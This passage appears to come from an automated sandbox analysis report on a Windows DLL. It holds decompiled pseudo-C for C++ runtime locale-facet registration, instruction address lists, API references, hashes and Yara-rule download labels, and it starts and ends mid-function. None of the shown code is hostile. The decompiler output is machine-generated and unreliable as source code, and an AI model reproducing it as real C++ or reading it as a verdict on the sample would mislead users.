																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t897 + 4))))();
																																																							 *0x6d53fdf4 = _t897;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t897 = _t919;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t896 =  *(_t946 - 0x10);
																																																				 *(_t946 - 0x10) = _t896;
																																																				 *(_t946 - 4) = 1;
																																																				E6D478A0B(__eflags, _t896);
																																																				 *0x6d5001e8();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t896 + 4))))();
																																																				 *0x6d53fdf0 = _t896;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t896 = _t918;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t895 =  *(_t946 - 0x10);
																																																	 *(_t946 - 0x10) = _t895;
																																																	 *(_t946 - 4) = 1;
																																																	E6D478A0B(__eflags, _t895);
																																																	 *0x6d5001e8();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t895 + 4))))();
																																																	 *0x6d53fdc4 = _t895;
																																																	goto L103;
																																																}
																																															} else {
																																																_t895 = _t917;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t894 =  *(_t946 - 0x10);
																																														 *(_t946 - 0x10) = _t894;
																																														 *(_t946 - 4) = 1;
																																														E6D478A0B(__eflags, _t894);
																																														 *0x6d5001e8();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t894 + 4))))();
																																														 *0x6d53fdec = _t894;
																																														goto L96;
																																													}
																																												} else {
																																													_t894 = _t916;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t893 =  *(_t946 - 0x10);
																																											 *(_t946 - 0x10) = _t893;
																																											 *(_t946 - 4) = 1;
																																											E6D478A0B(__eflags, _t893);
																																											 *0x6d5001e8();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t893 + 4))))();
																																											 *0x6d53fdd8 = _t893;
																																											goto L89;
																																										}
																																									} else {
																																										_t893 = _t915;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t892 =  *(_t946 - 0x10);
																																								 *(_t946 - 0x10) = _t892;
																																								 *(_t946 - 4) = 1;
																																								E6D478A0B(__eflags, _t892);
																																								 *0x6d5001e8();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t892 + 4))))();
																																								 *0x6d53fddc = _t892;
																																								goto L82;
																																							}
																																						} else {
																																							_t892 = _t914;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t891 =  *(_t946 - 0x10);
																																					 *(_t946 - 0x10) = _t891;
																																					 *(_t946 - 4) = 1;
																																					E6D478A0B(__eflags, _t891);
																																					 *0x6d5001e8();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t891 + 4))))();
																																					 *0x6d53fe08 = _t891;
																																					goto L75;
																																				}
																																			} else {
																																				_t891 = _t913;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t890 =  *(_t946 - 0x10);
																																		 *(_t946 - 0x10) = _t890;
																																		 *(_t946 - 4) = 1;
																																		E6D478A0B(__eflags, _t890);
																																		 *0x6d5001e8();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t890 + 4))))();
																																		 *0x6d53fe0c = _t890;
																																		goto L68;
																																	}
																																} else {
																																	_t890 = _t912;
																																	goto L68;
																																}
																															}
																														} else {
																															_t889 =  *(_t946 - 0x10);
																															 *(_t946 - 0x10) = _t889;
																															 *(_t946 - 4) = 1;
																															E6D478A0B(__eflags, _t889);
																															 *0x6d5001e8();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t889 + 4))))();
																															 *0x6d53fdd4 = _t889;
																															goto L61;
																														}
																													} else {
																														_t889 = _t911;
																														goto L61;
																													}
																												}
																											} else {
																												_t888 =  *(_t946 - 0x10);
																												 *(_t946 - 0x10) = _t888;
																												 *(_t946 - 4) = 1;
																												E6D478A0B(__eflags, _t888);
																												 *0x6d5001e8();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t888 + 4))))();
																												 *0x6d53fe04 = _t888;
																												goto L54;
																											}
																										} else {
																											_t888 = _t910;
																											goto L54;
																										}
																									}
																								} else {
																									_t887 =  *(_t946 - 0x10);
																									 *(_t946 - 0x10) = _t887;
																									 *(_t946 - 4) = 1;
																									E6D478A0B(__eflags, _t887);
																									 *0x6d5001e8();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t887 + 4))))();
																									 *0x6d53fdd0 = _t887;
																									goto L47;
																								}
																							} else {
																								_t887 = _t909;
																								goto L47;
																							}
																						}
																					} else {
																						_t886 =  *(_t946 - 0x10);
																						 *(_t946 - 0x10) = _t886;
																						 *(_t946 - 4) = 1;
																						E6D478A0B(__eflags, _t886);
																						 *0x6d5001e8();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t886 + 4))))();
																						 *0x6d53fe00 = _t886;
																						goto L40;
																					}
																				} else {
																					_t886 = _t908;
																					goto L40;
																				}
																			}
																		} else {
																			_t885 =  *(_t946 - 0x10);
																			 *(_t946 - 0x10) = _t885;
																			 *(_t946 - 4) = 1;
																			E6D478A0B(__eflags, _t885);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t885 + 4))))();
																			 *0x6d53fdcc = _t885;
																			goto L33;
																		}
																	} else {
																		_t885 = _t907;
																		goto L33;
																	}
																}
															} else {
																_t884 =  *(_t946 - 0x10);
																 *(_t946 - 0x10) = _t884;
																 *(_t946 - 4) = 1;
																E6D478A0B(__eflags, _t884);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t884 + 4))))();
																 *0x6d53fdfc = _t884;
																goto L26;
															}
														} else {
															_t884 = _t906;
															goto L26;
														}
													}
												} else {
													_t883 =  *(_t946 - 0x10);
													 *(_t946 - 0x10) = _t883;
													 *(_t946 - 4) = 1;
													E6D478A0B(__eflags, _t883);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t883 + 4))))();
													 *0x6d53fde8 = _t883;
													goto L19;
												}
											} else {
												_t883 = _t905;
												goto L19;
											}
										}
									} else {
										_t882 =  *(_t946 - 0x10);
										 *(_t946 - 0x10) = _t882;
										 *(_t946 - 4) = 1;
										E6D478A0B(__eflags, _t882);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t882 + 4))))();
										 *0x6d53fdc8 = _t882;
										goto L12;
									}
								} else {
									_t882 = _t904;
									goto L12;
								}
							}
						} else {
							_t881 =  *(_t946 - 0x10);
							 *(_t946 - 0x10) = _t881;
							 *(_t946 - 4) = 1;
							E6D478A0B(__eflags, _t881);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t881 + 4))))();
							 *0x6d53fdf8 = _t881;
							goto L5;
						}
					} else {
						_t881 = _t903;
						goto L5;
					}
				}
			}

0x6d480420
0x6d480420
0x6d480420
0x6d480427
0x6d480431
0x6d480436
0x6d480441
0x6d480445
0x6d480448
0x6d48044d
0x6d480451
0x6d480456
0x6d48045a
0x6d48049f
0x6d4804a2
0x6d4804ae
0x6d48045c
0x6d48045e
0x6d480464
0x6d48046a
0x6d480472
0x6d480475
0x6d4804b2
0x6d4804c0
0x6d4804c5
0x6d4804c6
0x6d4804cd
0x6d4804d7
0x6d4804dc
0x6d4804e7
0x6d4804eb
0x6d4804ee
0x6d4804f3
0x6d4804fc
0x6d4804fe
0x6d480500
0x6d480545
0x6d480548
0x6d480554
0x6d480502
0x6d480502
0x6d480504
0x6d48050a
0x6d480510
0x6d480518
0x6d48051b
0x6d480558
0x6d480566
0x6d48056b
0x6d48056c
0x6d480573
0x6d48057d
0x6d480582
0x6d48058d
0x6d480591
0x6d480594
0x6d480599
0x6d4805a2
0x6d4805a4
0x6d4805a6
0x6d4805eb
0x6d4805ee
0x6d4805fa
0x6d4805a8
0x6d4805a8
0x6d4805aa
0x6d4805b0
0x6d4805b6
0x6d4805be
0x6d4805c1
0x6d4805fe
0x6d48060c
0x6d480611
0x6d480612
0x6d480619
0x6d480623
0x6d480628
0x6d480633
0x6d480637
0x6d48063a
0x6d48063f
0x6d480648
0x6d48064a
0x6d48064c
0x6d480691
0x6d480694
0x6d4806a0
0x6d48064e
0x6d48064e
0x6d480650
0x6d480656
0x6d48065c
0x6d480664
0x6d480667
0x6d4806a4
0x6d4806b2
0x6d4806b7
0x6d4806b8
0x6d4806bf
0x6d4806c9
0x6d4806ce
0x6d4806d9
0x6d4806dd
0x6d4806e0
0x6d4806e5
0x6d4806ee
0x6d4806f0
0x6d4806f2
0x6d480737
0x6d48073a
0x6d480746
0x6d4806f4
0x6d4806f4
0x6d4806f6
0x6d4806fc
0x6d480702
0x6d48070a
0x6d48070d
0x6d48074a
0x6d480758
0x6d48075d
0x6d48075e
0x6d480765
0x6d48076f
0x6d480774
0x6d48077f
0x6d480783
0x6d480786
0x6d48078b
0x6d480794
0x6d480796
0x6d480798
0x6d4807dd
0x6d4807e0
0x6d4807ec
0x6d48079a
0x6d48079a
0x6d48079c
0x6d4807a2
0x6d4807a8
0x6d4807b0
0x6d4807b3
0x6d4807f0
0x6d4807fe
0x6d480803
0x6d480804
0x6d48080b
0x6d480815
0x6d48081a
0x6d480825
0x6d480829
0x6d48082c
0x6d480831
0x6d48083a
0x6d48083c
0x6d48083e
0x6d480883
0x6d480886
0x6d480892
0x6d480840
0x6d480840
0x6d480842
0x6d480848
0x6d48084e
0x6d480856
0x6d480859
0x6d480896
0x6d4808a4
0x6d4808a9
0x6d4808aa
0x6d4808b1
0x6d4808bb
0x6d4808c0
0x6d4808cb
0x6d4808cf
0x6d4808d2
0x6d4808d7
0x6d4808e0
0x6d4808e2
0x6d4808e4
0x6d480929
0x6d48092c
0x6d480938
0x6d4808e6
0x6d4808e6
0x6d4808e8
0x6d4808ee
0x6d4808f4
0x6d4808fc
0x6d4808ff
0x6d48093c
0x6d48094a
0x6d48094f
0x6d480950
0x6d480957
0x6d480961
0x6d480966
0x6d480971
0x6d480975
0x6d480978
0x6d48097d
0x6d480986
0x6d480988
0x6d48098a
0x6d4809cf
0x6d4809d2
0x6d4809de
0x6d48098c
0x6d48098c
0x6d48098e
0x6d480994
0x6d48099a
0x6d4809a2
0x6d4809a5
0x6d4809e2
0x6d4809f0
0x6d4809f5
0x6d4809f6
0x6d4809fd
0x6d480a07
0x6d480a0c
0x6d480a17
0x6d480a1b
0x6d480a1e
0x6d480a23
0x6d480a2c
0x6d480a2e
0x6d480a30
0x6d480a75
0x6d480a78
0x6d480a84
0x6d480a32
0x6d480a32
0x6d480a34
0x6d480a3a
0x6d480a40
0x6d480a48
0x6d480a4b
0x6d480a88
0x6d480a96
0x6d480a9b
0x6d480a9c
0x6d480aa3
0x6d480aad
0x6d480ab2
0x6d480abd
0x6d480ac1
0x6d480ac4
0x6d480ac9
0x6d480ad2
0x6d480ad4
0x6d480ad6
0x6d480b1b
0x6d480b1e
0x6d480b2a
0x6d480ad8
0x6d480ad8
0x6d480ada
0x6d480ae0
0x6d480ae6
0x6d480aee
0x6d480af1
0x6d480b2e
0x6d480b3c
0x6d480b41
0x6d480b42
0x6d480b49
0x6d480b53
0x6d480b58
0x6d480b63
0x6d480b67
0x6d480b6a
0x6d480b6f
0x6d480b78
0x6d480b7a
0x6d480b7c
0x6d480bc1
0x6d480bc4
0x6d480bd0
0x6d480b7e
0x6d480b7e
0x6d480b80
0x6d480b86
0x6d480b8c
0x6d480b94
0x6d480b97
0x6d480bd4
0x6d480be2
0x6d480be7
0x6d480be8
0x6d480bef
0x6d480bf9
0x6d480bfe
0x6d480c09
0x6d480c0d
0x6d480c10
0x6d480c15
0x6d480c1e
0x6d480c20
0x6d480c22
0x6d480c67
0x6d480c6a
0x6d480c76
0x6d480c24
0x6d480c24
0x6d480c26
0x6d480c2c
0x6d480c32
0x6d480c3a
0x6d480c3d
0x6d480c7a
0x6d480c88
0x6d480c8d
0x6d480c8e
0x6d480c95
0x6d480c9f
0x6d480ca4
0x6d480caf
0x6d480cb3
0x6d480cb6
0x6d480cbb
0x6d480cc4
0x6d480cc6
0x6d480cc8
0x6d480d0d
0x6d480d10
0x6d480d1c
0x6d480cca
0x6d480cca
0x6d480ccc
0x6d480cd2
0x6d480cd8
0x6d480ce0
0x6d480ce3
0x6d480d20
0x6d480d2e
0x6d480d33
0x6d480d34
0x6d480d3b
0x6d480d45
0x6d480d4a
0x6d480d55
0x6d480d59
0x6d480d5c
0x6d480d61
0x6d480d6a
0x6d480d6c
0x6d480d6e
0x6d480db3
0x6d480db6
0x6d480dc2
0x6d480d70
0x6d480d70
0x6d480d72
0x6d480d78
0x6d480d7e
0x6d480d86
0x6d480d89
0x6d480dc6
0x6d480dd4
0x6d480dd9
0x6d480dda
0x6d480de1
0x6d480deb
0x6d480df0
0x6d480dfb
0x6d480dff
0x6d480e02
0x6d480e07
0x6d480e10
0x6d480e12
0x6d480e14
0x6d480e59
0x6d480e5c
0x6d480e68
0x6d480e16
0x6d480e16
0x6d480e18
0x6d480e1e
0x6d480e24
0x6d480e2c
0x6d480e2f
0x6d480e6c
0x6d480e7a
0x6d480e7f
0x6d480e80
0x6d480e87
0x6d480e91
0x6d480e96
0x6d480ea1
0x6d480ea5
0x6d480ea8
0x6d480ead
0x6d480eb6
0x6d480eb8
0x6d480eba
0x6d480eff
0x6d480f02
0x6d480f0e
0x6d480ebc
0x6d480ebc
0x6d480ebe
0x6d480ec4
0x6d480eca
0x6d480ed2
0x6d480ed5
0x6d480f12
0x6d480f20
0x6d480f25
0x6d480f26
0x6d480f2d
0x6d480f37
0x6d480f3c
0x6d480f47
0x6d480f4b
0x6d480f4e
0x6d480f53
0x6d480f5c
0x6d480f5e
0x6d480f60
0x6d480fa5
0x6d480fa8
0x6d480fb4
0x6d480f62
0x6d480f62
0x6d480f64
0x6d480f6a
0x6d480f70
0x6d480f78
0x6d480f7b
0x6d480fb8
0x6d480fc6
0x6d480fcb
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d481002
0x6d481004
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64
0x6d480ed7
0x6d480ed7
0x6d480eda
0x6d480ede
0x6d480ee2
0x6d480eef
0x6d480ef7
0x6d480ef9
0x00000000
0x6d480ef9
0x6d480ec0
0x6d480ec0
0x00000000
0x6d480ec0
0x6d480ebe
0x6d480e31
0x6d480e31
0x6d480e34
0x6d480e38
0x6d480e3c
0x6d480e49
0x6d480e51
0x6d480e53
0x00000000
0x6d480e53
0x6d480e1a
0x6d480e1a
0x00000000
0x6d480e1a
0x6d480e18
0x6d480d8b
0x6d480d8b
0x6d480d8e
0x6d480d92
0x6d480d96
0x6d480da3
0x6d480dab
0x6d480dad
0x00000000
0x6d480dad
0x6d480d74
0x6d480d74
0x00000000
0x6d480d74
0x6d480d72
0x6d480ce5
0x6d480ce5
0x6d480ce8
0x6d480cec
0x6d480cf0
0x6d480cfd
0x6d480d05
0x6d480d07
0x00000000
0x6d480d07
0x6d480cce
0x6d480cce
0x00000000
0x6d480cce
0x6d480ccc
0x6d480c3f
0x6d480c3f
0x6d480c42
0x6d480c46
0x6d480c4a
0x6d480c57
0x6d480c5f
0x6d480c61
0x00000000
0x6d480c61
0x6d480c28
0x6d480c28
0x00000000
0x6d480c28
0x6d480c26
0x6d480b99
0x6d480b99
0x6d480b9c
0x6d480ba0
0x6d480ba4
0x6d480bb1
0x6d480bb9
0x6d480bbb
0x00000000
0x6d480bbb
0x6d480b82
0x6d480b82
0x00000000
0x6d480b82
0x6d480b80
0x6d480af3
0x6d480af3
0x6d480af6
0x6d480afa
0x6d480afe
0x6d480b0b
0x6d480b13
0x6d480b15
0x00000000
0x6d480b15
0x6d480adc
0x6d480adc
0x00000000
0x6d480adc
0x6d480ada
0x6d480a4d
0x6d480a4d
0x6d480a50
0x6d480a54
0x6d480a58
0x6d480a65
0x6d480a6d
0x6d480a6f
0x00000000
0x6d480a6f
0x6d480a36
0x6d480a36
0x00000000
0x6d480a36
0x6d480a34
0x6d4809a7
0x6d4809a7
0x6d4809aa
0x6d4809ae
0x6d4809b2
0x6d4809bf
0x6d4809c7
0x6d4809c9
0x00000000
0x6d4809c9
0x6d480990
0x6d480990
0x00000000
0x6d480990
0x6d48098e
0x6d480901
0x6d480901
0x6d480904
0x6d480908
0x6d48090c
0x6d480919
0x6d480921
0x6d480923
0x00000000
0x6d480923
0x6d4808ea
0x6d4808ea
0x00000000
0x6d4808ea
0x6d4808e8
0x6d48085b
0x6d48085b
0x6d48085e
0x6d480862
0x6d480866
0x6d480873
0x6d48087b
0x6d48087d
0x00000000
0x6d48087d
0x6d480844
0x6d480844
0x00000000
0x6d480844
0x6d480842
0x6d4807b5
0x6d4807b5
0x6d4807b8
0x6d4807bc
0x6d4807c0
0x6d4807cd
0x6d4807d5
0x6d4807d7
0x00000000
0x6d4807d7
0x6d48079e
0x6d48079e
0x00000000
0x6d48079e
0x6d48079c
0x6d48070f
0x6d48070f
0x6d480712
0x6d480716
0x6d48071a
0x6d480727
0x6d48072f
0x6d480731
0x00000000
0x6d480731
0x6d4806f8
0x6d4806f8
0x00000000
0x6d4806f8
0x6d4806f6
0x6d480669
0x6d480669
0x6d48066c
0x6d480670
0x6d480674
0x6d480681
0x6d480689
0x6d48068b
0x00000000
0x6d48068b
0x6d480652
0x6d480652
0x00000000
0x6d480652
0x6d480650
0x6d4805c3
0x6d4805c3
0x6d4805c6
0x6d4805ca
0x6d4805ce
0x6d4805db
0x6d4805e3
0x6d4805e5
0x00000000
0x6d4805e5
0x6d4805ac
0x6d4805ac
0x00000000
0x6d4805ac
0x6d4805aa
0x6d48051d
0x6d48051d
0x6d480520
0x6d480524
0x6d480528
0x6d480535
0x6d48053d
0x6d48053f
0x00000000
0x6d48053f
0x6d480506
0x6d480506
0x00000000
0x6d480506
0x6d480504
0x6d480477
0x6d480477
0x6d48047a
0x6d48047e
0x6d480482
0x6d48048f
0x6d480497
0x6d480499
0x00000000
0x6d480499
0x6d480460
0x6d480460
0x00000000
0x6d480460
0x6d48045e

APIs

__EH_prolog3.LIBCMT ref: 6D480427
std::_Lockit::_Lockit.LIBCPMT ref: 6D480431

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

collate.LIBCPMT ref: 6D48046B
std::_Facet_Register.LIBCPMT ref: 6D480482
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4804A2
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4804C0

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: 7ee3125191397fd929bf3fa2ea23136ac9ed5f00b1bbba070217940a6c362a9b
Instruction ID: bf2ccf3a0551a2146f17593b45fa2422438b2e61c61384e3bafa3a5d254fb74a
Opcode Fuzzy Hash: 7ee3125191397fd929bf3fa2ea23136ac9ed5f00b1bbba070217940a6c362a9b
Instruction Fuzzy Hash: 3D11EC329042299BCF15DFA1C880EEE7775AF80764F26040DD611BB2A0DF30DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4804C6, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6D4804C6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t293;
				signed int _t294;
				void* _t306;
				void* _t319;
				void* _t332;
				void* _t345;
				void* _t358;
				void* _t371;
				void* _t384;
				void* _t397;
				void* _t410;
				void* _t423;
				void* _t436;
				void* _t449;
				void* _t462;
				void* _t475;
				void* _t488;
				void* _t501;
				void* _t514;
				void* _t527;
				void* _t540;
				signed int _t777;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				void* _t902;
				void* _t906;

				_t838 = __edx;
				_t637 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t902 - 0x14, 0);
				_t861 =  *0x6d53fdc8; // 0x0
				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
				 *(_t902 - 0x10) = _t861;
				_t293 = E6D451D10();
				_t640 =  *((intOrPtr*)(_t902 + 8));
				_t294 = E6D452140( *((intOrPtr*)(_t902 + 8)), _t293);
				_t840 = _t294;
				if(_t294 != 0) {
					L5:
					E6D476A77(_t902 - 0x14);
					return E6D490E67(_t840);
				} else {
					if(_t861 == 0) {
						_push( *((intOrPtr*)(_t902 + 8)));
						_push(_t902 - 0x10);
						__eflags = E6D482243(__ebx, _t640, __edx, _t840, _t861, __eflags, _t906) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t902 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t840, _t861);
							E6D476A10(_t902 - 0x14, 0);
							_t862 =  *0x6d53fde8; // 0x0
							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
							 *(_t902 - 0x10) = _t862;
							_t306 = E6D451D10();
							_t647 =  *((intOrPtr*)(_t902 + 8));
							_t841 = E6D452140( *((intOrPtr*)(_t902 + 8)), _t306);
							__eflags = _t841;
							if(_t841 != 0) {
								L12:
								E6D476A77(_t902 - 0x14);
								return E6D490E67(_t841);
							} else {
								__eflags = _t862;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t902 + 8)));
									_push(_t902 - 0x10);
									__eflags = E6D4822E5(_t637, _t647, __edx, _t841, _t862, __eflags, _t906) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t902 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t637, _t841, _t862);
										E6D476A10(_t902 - 0x14, 0);
										_t863 =  *0x6d53fdfc; // 0x0
										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
										 *(_t902 - 0x10) = _t863;
										_t319 = E6D451D10();
										_t654 =  *((intOrPtr*)(_t902 + 8));
										_t842 = E6D452140( *((intOrPtr*)(_t902 + 8)), _t319);
										__eflags = _t842;
										if(_t842 != 0) {
											L19:
											E6D476A77(_t902 - 0x14);
											return E6D490E67(_t842);
										} else {
											__eflags = _t863;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t902 + 8)));
												_push(_t902 - 0x10);
												__eflags = E6D482355(_t637, _t654, __edx, _t842, _t863, __eflags, _t906) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t902 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t637, _t842, _t863);
													E6D476A10(_t902 - 0x14, 0);
													_t864 =  *0x6d53fdcc; // 0x0
													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
													 *(_t902 - 0x10) = _t864;
													_t332 = E6D451D10();
													_t661 =  *((intOrPtr*)(_t902 + 8));
													_t843 = E6D452140( *((intOrPtr*)(_t902 + 8)), _t332);
													__eflags = _t843;
													if(_t843 != 0) {
														L26:
														E6D476A77(_t902 - 0x14);
														return E6D490E67(_t843);
													} else {
														__eflags = _t864;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t902 + 8)));
															_push(_t902 - 0x10);
															__eflags = E6D4823BD(_t637, _t661, _t838, _t843, _t864, __eflags, _t906) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t902 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t637, _t843, _t864);
																E6D476A10(_t902 - 0x14, 0);
																_t865 =  *0x6d53fe00; // 0x0
																 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																 *(_t902 - 0x10) = _t865;
																_t345 = E6D451D10();
																_t668 =  *((intOrPtr*)(_t902 + 8));
																_t844 = E6D452140( *((intOrPtr*)(_t902 + 8)), _t345);
																__eflags = _t844;
																if(_t844 != 0) {
																	L33:
																	E6D476A77(_t902 - 0x14);
																	return E6D490E67(_t844);
																} else {
																	__eflags = _t865;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t902 + 8)));
																		_push(_t902 - 0x10);
																		__eflags = E6D482425(_t637, _t668, _t838, _t844, _t865, __eflags, _t906) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t902 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(0x14);
																			E6D490E9E(0x6d4fe9a2, _t637, _t844, _t865);
																			E6D476A10(_t902 - 0x14, 0);
																			_t866 =  *0x6d53fdd0; // 0x0
																			 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																			 *(_t902 - 0x10) = _t866;
																			_t358 = E6D451D10();
																			_t675 =  *((intOrPtr*)(_t902 + 8));
																			_t845 = E6D452140( *((intOrPtr*)(_t902 + 8)), _t358);
																			__eflags = _t845;
																			if(_t845 != 0) {
																				L40:
																				E6D476A77(_t902 - 0x14);
																				return E6D490E67(_t845);
																			} else {
																				__eflags = _t866;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t902 + 8)));
																					_push(_t902 - 0x10);
																					__eflags = E6D48248D(_t637, _t675, _t838, _t845, _t866, __eflags, _t906) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D451940();
																						E6D4924F4(_t902 - 0x20, 0x6d5329cc);
																						asm("int3");
																						_push(0x14);
																						E6D490E9E(0x6d4fe9a2, _t637, _t845, _t866);
																						E6D476A10(_t902 - 0x14, 0);
																						_t867 =  *0x6d53fe04; // 0x0
																						 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																						 *(_t902 - 0x10) = _t867;
																						_t371 = E6D451D10();
																						_t682 =  *((intOrPtr*)(_t902 + 8));
																						_t846 = E6D452140( *((intOrPtr*)(_t902 + 8)), _t371);
																						__eflags = _t846;
																						if(_t846 != 0) {
																							L47:
																							E6D476A77(_t902 - 0x14);
																							return E6D490E67(_t846);
																						} else {
																							__eflags = _t867;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t902 + 8)));
																								_push(_t902 - 0x10);
																								__eflags = E6D4824F5(_t637, _t682, _t838, _t846, _t867, __eflags, _t906) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D451940();
